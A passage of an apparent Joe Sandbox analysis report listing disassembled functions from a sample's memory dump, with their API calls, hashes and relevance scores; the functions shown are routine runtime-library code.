                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _strcspn$H_prolog3_ctype
                                          • String ID:
                                          • API String ID: 838279627-0
                                          • Opcode ID: fe3e59a0287462718b20f793acab6a01406029725db608ef1ece60ca69ecddc5
                                          • Instruction ID: 040b37906118ef1caa0829e067be5d433311e5a3e24a4a8cd4898e9d63bddb50
                                          • Opcode Fuzzy Hash: fe3e59a0287462718b20f793acab6a01406029725db608ef1ece60ca69ecddc5
                                          • Instruction Fuzzy Hash: 9CB15775D002699FCF14DFA8D984AEEBBB9FF48320F144029F845AB211D734AE45CBA1
                                          Function 00A2C9CC Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _strcspn$H_prolog3_ctype
                                          • String ID:
                                          • API String ID: 838279627-0
                                          • Opcode ID: 4570406e7e3c321d30f322e8c914d5782e0b956aed7e2fe92eb5e8410d02fdb9
                                          • Instruction ID: e5553c283f7b361c7c9a09b8e078790c9157ba88881931763ecb5a242646d403
                                          • Opcode Fuzzy Hash: 4570406e7e3c321d30f322e8c914d5782e0b956aed7e2fe92eb5e8410d02fdb9
                                          • Instruction Fuzzy Hash: 6BB16C75D00269DFDF14DFA8D985AEEBBB9FF48320F144029E845AB201D734AE45CBA1
                                          Function 00A5A37F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 04f9d30c51f2b0244de80eb4617da74159d0f329b2ec7b00a44890934ffcd9f7
                                          • Instruction ID: e3c8e12c4226e26ee7c4f4c0a3fb7ed467f44df59d18c8717421789ca4384a64
                                          • Opcode Fuzzy Hash: 04f9d30c51f2b0244de80eb4617da74159d0f329b2ec7b00a44890934ffcd9f7
                                          • Instruction Fuzzy Hash: D5511672701606AFDB298F94D945B7A73B5FF60312F10422DEC064B281E771EC8ADB92
                                          Function 00A52B47 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52B97
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00A52BB0
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A52BC6
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A52C07
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Context$Base::Concurrency::details::$EventThrow$AssignBlockedConcurrency::location::_Exception@8InternalSpinTraceUntil
                                          • String ID:
                                          • API String ID: 1204113144-0
                                          • Opcode ID: 712760b761d0e21f1def22bab2b3b6bc7355ec6d06072b2314b676b79eae7eb4
                                          • Instruction ID: 696dae3296c9d8066fcffa8226f78f46b874ea8e09e9a2efcd87bd3658847841
                                          • Opcode Fuzzy Hash: 712760b761d0e21f1def22bab2b3b6bc7355ec6d06072b2314b676b79eae7eb4
                                          • Instruction Fuzzy Hash: CE210835B002149FCB04EF68C986AADB7F5FF88721B514559E901AB381DF30AD09CB91
                                          Function 00A3EA00 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(?,21472377,?,?,2147239F,214723AF,00A8BF00,000000FF,?,00A400DC,214723AF,?,214723AF,?,00A3FD89), ref: 00A3EA59
                                          • CloseHandle.KERNEL32(?,21472377,?,?,2147239F,214723AF,00A8BF00,000000FF,?,00A400DC,214723AF,?,214723AF,?,00A3FD89), ref: 00A3EA6E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: w#G!$w#G!w#G!
                                          • API String ID: 2962429428-2921573523
                                          • Opcode ID: e3a69c5487c56a81fde2072bb082b2749e57373d70062dda8794fc4d7f0f53f6
                                          • Instruction ID: 8310bc2e35c28da4accda70d635278e79b5ba4065ea86b8102fcf5cf8cf550ea
                                          • Opcode Fuzzy Hash: e3a69c5487c56a81fde2072bb082b2749e57373d70062dda8794fc4d7f0f53f6
                                          • Instruction Fuzzy Hash: A1115E72A00608ABDF20CF69CC80B6AB7A8FB45775F14472AF925933D0DB70ED058A90
                                          Function 00A72D92 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue), ref: 00A72DC4
                                          • GetLastError.KERNEL32(?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue,00A9F560,FlsSetValue,00000000,00000364,?,00A7444C), ref: 00A72DD0
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A72D39,?,00000000,00000000,00000000,?,00A73066,00000006,FlsSetValue,00A9F560,FlsSetValue,00000000), ref: 00A72DDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: dc593347f6523df6c2140514c7d909bfa9a515818992ab118fce1276bdcf4de3
                                          • Instruction ID: 147e815434a7d0f77cb7d7815f4f8b30180a69093468aa5df38ab21fafd97b98
                                          • Opcode Fuzzy Hash: dc593347f6523df6c2140514c7d909bfa9a515818992ab118fce1276bdcf4de3
                                          • Instruction Fuzzy Hash: 5001FC37706222ABDB31CBA99C44BD7BBA8EF55B61B20C121F90AD3141CB20D90687E0
                                          Function 00A4D2DC Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D30E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D31E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D32E
                                          • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00A4D342
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Compare_exchange_acquire_4std::_
                                          • String ID:
                                          • API String ID: 3973403980-0
                                          • Opcode ID: 51a3f01b0ded8fa358fc08cd20b4c6dff69d5efc9a5e4fdeeaf29c1dc576d395
                                          • Instruction ID: 6b680dde0d81527be578c9ec6c5ed8e8b18544b4503fcaadbe5809f9abd28328
                                          • Opcode Fuzzy Hash: 51a3f01b0ded8fa358fc08cd20b4c6dff69d5efc9a5e4fdeeaf29c1dc576d395
                                          • Instruction Fuzzy Hash: A301C47A400149EBDF129F94EE468AD3B76BB89354F148415FD2888071DB32EA70EB83
                                          Function 00A429AD Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RegisterWaitForSingleObject.KERNEL32(00A4896E,00A54A42,75EC5D89,00A54B42,000000FF,0000000C), ref: 00A429C4
                                          • GetLastError.KERNEL32(?,00A54B42,75EC5D89,00A54A42,00A4896E,?,?,?,?,00A4896E,?,?,?,?,00000000), ref: 00A429D3
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A429E9
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A429F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                          • String ID:
                                          • API String ID: 3803302727-0
                                          • Opcode ID: 2c8778cda59bf84c55c9c53640ea83ee70751c0eb53072945906636ecbf0c889
                                          • Instruction ID: bd5bd792e51cbd5d8dba18b0d2709e41205e918c583e611f37e107a7ef0fd08f
                                          • Opcode Fuzzy Hash: 2c8778cda59bf84c55c9c53640ea83ee70751c0eb53072945906636ecbf0c889
                                          • Instruction Fuzzy Hash: C5F01C3560420ABBDF10EFA58E06FEF77B8AB08715F900555B515E50A1DA34DA149B60
                                          Function 00A426D2 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • ___crtCreateEventExW.LIBCPMT ref: 00A426E8
                                          • GetLastError.KERNEL32(?,?,?,?,?,00A41F19), ref: 00A426F6
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A4270C
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4271A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                          • String ID:
                                          • API String ID: 200240550-0
                                          • Opcode ID: 7a5fd9296f77e77b4e23514fe605b9cd7a537acaf760279a3082f58a370eb330
                                          • Instruction ID: 9bdebdcf7bca34456a2ab193297b729d4f87b81e4e5d4c92b36958630825ea9d
                                          • Opcode Fuzzy Hash: 7a5fd9296f77e77b4e23514fe605b9cd7a537acaf760279a3082f58a370eb330
                                          • Instruction Fuzzy Hash: A0E0D86661421A29EB10B3B54D03FBF36EC6B04704FC00854B925E40C3FE64D90442A0
                                          Function 00A428E9 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A41F19), ref: 00A428F3
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00A41F19), ref: 00A42902
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42918
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42926
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                          • String ID:
                                          • API String ID: 3016159387-0
                                          • Opcode ID: 2e863809ff040dc7f3ac1c493d317874721a47279547349ae3c9290e60f5038f
                                          • Instruction ID: 865ab4e8a31c6bc7d730a3f1aa1aa16580f72b7820998d8da11744c14556d071
                                          • Opcode Fuzzy Hash: 2e863809ff040dc7f3ac1c493d317874721a47279547349ae3c9290e60f5038f
                                          • Instruction Fuzzy Hash: EFE01A75A0020EAACB10EBF59A4AAEF73BC6B04705F9004A5B542E6052EF24DE098770
                                          Function 00A42A41 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetThreadPriority.KERNEL32(?,?), ref: 00A42A4D
                                          • GetLastError.KERNEL32 ref: 00A42A59
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42A6F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42A7D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                          • String ID:
                                          • API String ID: 4286982218-0
                                          • Opcode ID: dbf97dcbf2f0d95171a8b4f914606ebb57d6279b1caf8347eb45ddb6a464c40f
                                          • Instruction ID: 6d77e8e0e3c5e49655c38e5f25760ef6bb262ac9b4980be244fe105fb03ac293
                                          • Opcode Fuzzy Hash: dbf97dcbf2f0d95171a8b4f914606ebb57d6279b1caf8347eb45ddb6a464c40f
                                          • Instruction Fuzzy Hash: 97E0863560010A6BCF20FBA1DD06BFF77BC7B04744F804865B916E50A2DF35D91987A4
                                          Function 00A42B07 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • TlsSetValue.KERNEL32(?,00000000,00A47D16,00000000,?,?,00A41F19,?,?,?,00000000,?,00000000), ref: 00A42B13
                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00A42B1F
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42B35
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42B43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                          • String ID:
                                          • API String ID: 1964976909-0
                                          • Opcode ID: 43dd2bb9578a782e23dda497eed64dccd4ef72a23df5a76577d71bdd79bfb610
                                          • Instruction ID: 95da6532c43d124575a066c2a730cba69cffdfe1e4163809860ce33a7bc93d38
                                          • Opcode Fuzzy Hash: 43dd2bb9578a782e23dda497eed64dccd4ef72a23df5a76577d71bdd79bfb610
                                          • Instruction Fuzzy Hash: 80E04F356142096BDF10AFA18D06BBF37BCBB04345F804955B915E50A1EE35D91687A4
                                          Function 00A42AAE Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • TlsAlloc.KERNEL32(?,00A41F19), ref: 00A42AB4
                                          • GetLastError.KERNEL32 ref: 00A42AC1
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42AD7
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A42AE5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                          • String ID:
                                          • API String ID: 3103352999-0
                                          • Opcode ID: 94acf5f50ae45793e87c8fe980bf36b92196ac758c1a42657f0b0808d951e0e8
                                          • Instruction ID: 77811dd12ba3293fa65210c4721e9f71f6365fba5e259ae47071be566f2f3258
                                          • Opcode Fuzzy Hash: 94acf5f50ae45793e87c8fe980bf36b92196ac758c1a42657f0b0808d951e0e8
                                          • Instruction Fuzzy Hash: 8AE0C2346141096ACB20F7B59D0EBBF72BCBB40314FE00A65F922E10E1EE68D81947A0
                                          Function 009FE5A0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 387COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FE9A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: FilterWithBufferedInput$w#G!
                                          • API String ID: 2005118841-4183689890
                                          • Opcode ID: fc9f0a62acb559c55e8d41d1d76d26b66701708966695083e61780a2dc571b3a
                                          • Instruction ID: c1469bc54f5481910673db3fb08f3eb796901107b5d7f90c12c3448527fb6152
                                          • Opcode Fuzzy Hash: fc9f0a62acb559c55e8d41d1d76d26b66701708966695083e61780a2dc571b3a
                                          • Instruction Fuzzy Hash: 2EF14B71A007099FCB24DFA8C984AAEB7F6FF88300F144A2DE54697654EB70F945CB90
                                          Function 009F21D0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F23B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: RoundUpToMultipleOf: integer overflow$w#G!
                                          • API String ID: 2005118841-1561500468
                                          • Opcode ID: 95ec75ee5ce6ffb9bd7e7081ef3d38b0aa668d32a34313a901667eca80d3d1dd
                                          • Instruction ID: 089a4cf081f96adee24060ea29934cdb8f43945f36491efa9424eb8454da7c63
                                          • Opcode Fuzzy Hash: 95ec75ee5ce6ffb9bd7e7081ef3d38b0aa668d32a34313a901667eca80d3d1dd
                                          • Instruction Fuzzy Hash: 97C19071A00208AFDF24DFA4C895FEEBBB8EF54704F10416DF516A7291DB70AA49CB90
                                          Function 009F2C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 287COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
